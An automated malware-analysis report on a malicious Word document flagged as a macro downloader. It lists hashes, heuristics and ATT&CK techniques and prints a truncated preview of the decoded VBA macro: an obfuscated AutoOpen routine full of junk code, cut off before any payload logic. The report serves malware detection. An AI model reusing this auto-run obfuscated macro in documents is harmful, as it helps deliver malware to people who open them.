Office (OLE) malware analysis — malicious · 99c8328f4de1d1e2

MALICIOUS

Office (OLE)

216.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 909d565948907f43cb79ad78a427f898 SHA-1: afa817ff74032612a53c8f944af064cc7e3928fb SHA-256: 99c8328f4de1d1e2d8d4e20ab259c289a1dafe352b146b136a9bf6fbc575cff9

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro's obfuscated nature and the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' strongly suggest it functions as a downloader for a second-stage payload. The presence of the AutoOpen macro and the GetObject call are key indicators of this malicious behavior.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 46677 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	46677 bytes
SHA-256: `50507f3c51658dc24b61a4a5e24e11b968984d4298ee2a21d7b1a06f7c114110`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() tipaWufyjUkiGe = "cIfyQeqyQix" wYNdexumikyDu = Val("59217") & "lebyWCoz" On Error Resume Next Dim ciBilESUsidyyhADOfEP ciBilESUsidyyhADOfEP = 39452 Dim TAHuVEFoluiy bANeCanyLUNUPecodaQoTU = "mEBvOxafYlaGYLIV" bUTofExONJIieKoTylU = 44963 For TAHuVEFoluiy = 3 To 13 Dim MONjoLozyJUDyH MONjoLozyJUDyH = Fix(33640) Dim xYKACYsikyY For xYKACYsikyY = 1 To 10 Dim FYjabeieFewoGUMoPoM FYjabeieFewoGUMoPoM = Fix(65961) Next Dim bEwoIZeGacEPEQ bEwoIZeGacEPEQ = 94188 Next nYJEmOMuxEaeqOW = "NYbpYblOdaNyP" Dim WoFiGelem For WoFiGelem = 3 To 11 Dim qOkmifiXaqyzofUBb qOkmifiXaqyzofUBb = Fix(7404) Next cIfiaYzLyGixEPOD = "porinUPaVE" JixoaNoJO = 56540 Dim sAhyNEVyy For sAhyNEVyy = 10 To 13 Dim zEZExivUsENACi zEZExivUsENACi = Fix(85725) Next PYSaKuFd = 58130 Dim aeLOGawEdAZibOliq For aeLOGawEdAZibOliq = 8 To 10 Dim wyCoGeRusYqyCU wyCoGeRusYqyCU = Fix(80989) Next aAtexuLeQi = "dYioPAtaPIcNuMaF" Dim lYjUhUCOMahUToFdeHY wYaYneSuTOq = Val("92625") & "PIMUhiccVAxOJYA" lYjUhUCOMahUToFdeHY = 35171 SYRicOtORumDpeiY = Val("24768") & "JxOFItuPEKiVuXITOk" PIgeVEpYiENYZuZuRIP = 77902 Dim HiXOBOZit HiXOBOZit = 26854 Dim ROLEfODicuw lGYiAxAiyNAPYrExO = "PArYgaKEjY" Dim LoDacYpIPOhxUzyNewi LoDacYpIPOhxUzyNewi = 95515 ROLEfODicuw = 18628 kOHOmUheDEJIdAaluN = Val("34465") & "gLegACIQaQulUgEJ" pUrACYmUIQocYXYvas = Val("38836") & "QiGLYkUfiZIgoWytAwir" xiHACOBEBeTePizyxOPIZ = 49585 XShUkOewfI = "dhowekirigArIGIQef" gEVEsAkADEpeciqEna = StrReverse(LTrim("")) tECUaiiiTetOXUXYSi = "hiZUXEpEdat" Dim ZyfeiukyHEgEVyDYKereRu ZyfeiukyHEgEVyDYKereRu = 26120 kypEdeluraresagIdusu = Val("72617") & "SIFYliRiiyDEbNudUfyN" MoaEXImUTwsAzy = 94588 JuCusItoDINEIDaByGuk = "SosYJAKADIHaT" teivIJALOfoS = 48982 Dim pUNUQuGEo pUNUQuGEo = 10956 PNaLuKItylUvowORo = "btOQEiaRaJekuQUk" Dim XupeaogofuKIUpYha For XupeaogofuKIUpYha = 5 To 11 Dim wUJyhygaPoBeWaGuL wUJyhygaPoBeWaGuL = Fix(66024) Next VOHaHEDAi = 38102 Dim rOnYaifNa Dim sACEHiJoZYNUwoNUia sACEHiJoZYNUwoNUia = 23035 rOnYaifNa = 78147 GOXUdYHEXYTIK = 57463 Dim ehYHOaeveVIdERYJ For ehYHOaeveVIdERYJ = 3 To 13 Dim XODATiTYAFiwjExAb XODATiTYAFiwjExAb = Fix(66366) Next FEaUTejyZU = Val("36833") & "pixePyjAg" Dim MyzTaLuUHIFiMUFYu For MyzTaLuUHIFiMUFYu = 7 To 11 Dim RowobiWOJopABUJo RowobiWOJopABUJo = Fix(59035) Next Dim iYkEjaDoronARuHxezIJ iYkEjaDoronARuHxezIJ = 68854 Dim ZyPkeSEaOfiZIRiraZ ZyPkeSEaOfiZIRiraZ = 82522 tIpOsEGeKUNoXaPin = Val("37786") & "LObYJyGaaIqaCuaUFEPaK" XohIqiSiZeZiJ = "CUlOBEPeTFypAfQu" Dim xUnOBykIwUGARIsyqIaYmi For xUnOBykIwUGARIsyqIaYmi = 5 To 10 Dim vuJITuTIZOSaRIsi vuJITuTIZOSaRIsi = Fix(16998) DPiDadOVOt = 59064 LYMaVuWarCIhIhwo = 1214 Next Dim aOMidefekeLy aOMidefekeLy = 25582 Dim FaQKosOB FaQKosOB = 10567 tAjeRymANaKuMENbemyzO = "gEbTiMoKy" Dim iaKoGAGipHOfysloWA iaKoGAGipHOfysloWA = 86703 Dim FezokYvebuvEmyrIXoCUko FezokYvebuvEmyrIXoCUko = 44278 iifeZXyp = 48029 GiCeBiCEJi = 76636 KereQobazoZIVFzaZozY = 76882 Dim WIkoQovHIPommuaoHuT For WIkoQovHIPommuaoHuT = 3 To 12 Dim cYdyjOVEkipExEnANIL cYdyjOVEkipExEnANIL = Fix(89631) Next ZaciDIPakoVaziNU = "bOdZYGitl" Dim mEFEhANEiOFahuBeJyP mEFEhANEiOFahuBeJyP = 66317 Dim EzuiEcoTYRUnuS For EzuiEcoTYRUnuS = 3 To 12 Dim ZAlIFoKykoVAcITYRYSE ZAlIFoKykoVAcITYRYSE = Fix(99781) Next Dim BUNyZADoaaBEwKENUSun For BUNyZADoaaBEwKENUSun = 9 To 11 Dim TYTOVQowYNiceXaiIC TYTOVQowYNiceXaiIC = Fix(722) Next KYvufObycyromR = 2039 Dim ToKotovavAR Dim hUnItIHiPExosEvi For hUnItIHiPExosEvi = 9 To 11 Dim wYMATOLoNYPepEc wYMATOLoNYPepEc = Fix(6031) Next kuJIxUxakUjmyNliFve = "ZEJEKEjaaEgalUraEPPa" iEgUwesOYFigYKY = "reNyKITOHOT" For ToKotovavAR = ... (truncated)

SHA-256: 50507f3c51658dc24b61a4a5e24e11b968984d4298ee2a21d7b1a06f7c114110

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
tipaWufyjUkiGe = "cIfyQeqyQix"
wYNdexumikyDu = Val("59217") & "lebyWCoz"
On Error Resume Next
Dim ciBilESUsidyyhADOfEP
ciBilESUsidyyhADOfEP = 39452

Dim TAHuVEFoluiy
bANeCanyLUNUPecodaQoTU = "mEBvOxafYlaGYLIV"
bUTofExONJIieKoTylU = 44963
For TAHuVEFoluiy = 3 To 13
   Dim MONjoLozyJUDyH
   MONjoLozyJUDyH = Fix(33640)
Dim xYKACYsikyY
For xYKACYsikyY = 1 To 10
   Dim FYjabeieFewoGUMoPoM
   FYjabeieFewoGUMoPoM = Fix(65961)
Next
Dim bEwoIZeGacEPEQ
bEwoIZeGacEPEQ = 94188
Next
nYJEmOMuxEaeqOW = "NYbpYblOdaNyP"
Dim WoFiGelem
For WoFiGelem = 3 To 11
   Dim qOkmifiXaqyzofUBb
   qOkmifiXaqyzofUBb = Fix(7404)
Next
cIfiaYzLyGixEPOD = "porinUPaVE"
JixoaNoJO = 56540
Dim sAhyNEVyy
For sAhyNEVyy = 10 To 13
   Dim zEZExivUsENACi
   zEZExivUsENACi = Fix(85725)
Next
PYSaKuFd = 58130


Dim aeLOGawEdAZibOliq
For aeLOGawEdAZibOliq = 8 To 10
   Dim wyCoGeRusYqyCU
   wyCoGeRusYqyCU = Fix(80989)
Next
aAtexuLeQi = "dYioPAtaPIcNuMaF"
Dim lYjUhUCOMahUToFdeHY
wYaYneSuTOq = Val("92625") & "PIMUhiccVAxOJYA"
lYjUhUCOMahUToFdeHY = 35171
SYRicOtORumDpeiY = Val("24768") & "JxOFItuPEKiVuXITOk"
PIgeVEpYiENYZuZuRIP = 77902
Dim HiXOBOZit
HiXOBOZit = 26854
Dim ROLEfODicuw
lGYiAxAiyNAPYrExO = "PArYgaKEjY"
Dim LoDacYpIPOhxUzyNewi
LoDacYpIPOhxUzyNewi = 95515
ROLEfODicuw = 18628

kOHOmUheDEJIdAaluN = Val("34465") & "gLegACIQaQulUgEJ"
pUrACYmUIQocYXYvas = Val("38836") & "QiGLYkUfiZIgoWytAwir"
xiHACOBEBeTePizyxOPIZ = 49585

XShUkOewfI = "dhowekirigArIGIQef"
gEVEsAkADEpeciqEna = StrReverse(LTrim(""))

tECUaiiiTetOXUXYSi = "hiZUXEpEdat"
Dim ZyfeiukyHEgEVyDYKereRu
ZyfeiukyHEgEVyDYKereRu = 26120

kypEdeluraresagIdusu = Val("72617") & "SIFYliRiiyDEbNudUfyN"
MoaEXImUTwsAzy = 94588
JuCusItoDINEIDaByGuk = "SosYJAKADIHaT"
teivIJALOfoS = 48982


Dim pUNUQuGEo
pUNUQuGEo = 10956
PNaLuKItylUvowORo = "btOQEiaRaJekuQUk"
Dim XupeaogofuKIUpYha
For XupeaogofuKIUpYha = 5 To 11
   Dim wUJyhygaPoBeWaGuL
   wUJyhygaPoBeWaGuL = Fix(66024)
Next
VOHaHEDAi = 38102
Dim rOnYaifNa
Dim sACEHiJoZYNUwoNUia
sACEHiJoZYNUwoNUia = 23035
rOnYaifNa = 78147
GOXUdYHEXYTIK = 57463
Dim ehYHOaeveVIdERYJ
For ehYHOaeveVIdERYJ = 3 To 13
   Dim XODATiTYAFiwjExAb
   XODATiTYAFiwjExAb = Fix(66366)
Next
FEaUTejyZU = Val("36833") & "pixePyjAg"
Dim MyzTaLuUHIFiMUFYu
For MyzTaLuUHIFiMUFYu = 7 To 11
   Dim RowobiWOJopABUJo
   RowobiWOJopABUJo = Fix(59035)
Next
Dim iYkEjaDoronARuHxezIJ
iYkEjaDoronARuHxezIJ = 68854
Dim ZyPkeSEaOfiZIRiraZ
ZyPkeSEaOfiZIRiraZ = 82522

tIpOsEGeKUNoXaPin = Val("37786") & "LObYJyGaaIqaCuaUFEPaK"
XohIqiSiZeZiJ = "CUlOBEPeTFypAfQu"
Dim xUnOBykIwUGARIsyqIaYmi
For xUnOBykIwUGARIsyqIaYmi = 5 To 10
   Dim vuJITuTIZOSaRIsi
   vuJITuTIZOSaRIsi = Fix(16998)
DPiDadOVOt = 59064
LYMaVuWarCIhIhwo = 1214
Next
Dim aOMidefekeLy
aOMidefekeLy = 25582
Dim FaQKosOB
FaQKosOB = 10567
tAjeRymANaKuMENbemyzO = "gEbTiMoKy"
Dim iaKoGAGipHOfysloWA
iaKoGAGipHOfysloWA = 86703

Dim FezokYvebuvEmyrIXoCUko
FezokYvebuvEmyrIXoCUko = 44278
iifeZXyp = 48029
GiCeBiCEJi = 76636

KereQobazoZIVFzaZozY = 76882
Dim WIkoQovHIPommuaoHuT
For WIkoQovHIPommuaoHuT = 3 To 12
   Dim cYdyjOVEkipExEnANIL
   cYdyjOVEkipExEnANIL = Fix(89631)
Next
ZaciDIPakoVaziNU = "bOdZYGitl"
Dim mEFEhANEiOFahuBeJyP
mEFEhANEiOFahuBeJyP = 66317
Dim EzuiEcoTYRUnuS
For EzuiEcoTYRUnuS = 3 To 12
   Dim ZAlIFoKykoVAcITYRYSE
   ZAlIFoKykoVAcITYRYSE = Fix(99781)
Next
Dim BUNyZADoaaBEwKENUSun
For BUNyZADoaaBEwKENUSun = 9 To 11
   Dim TYTOVQowYNiceXaiIC
   TYTOVQowYNiceXaiIC = Fix(722)
Next
KYvufObycyromR = 2039
Dim ToKotovavAR
Dim hUnItIHiPExosEvi
For hUnItIHiPExosEvi = 9 To 11
   Dim wYMATOLoNYPepEc
   wYMATOLoNYPepEc = Fix(6031)
Next
kuJIxUxakUjmyNliFve = "ZEJEKEjaaEgalUraEPPa"
iEgUwesOYFigYKY = "reNyKITOHOT"
For ToKotovavAR =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.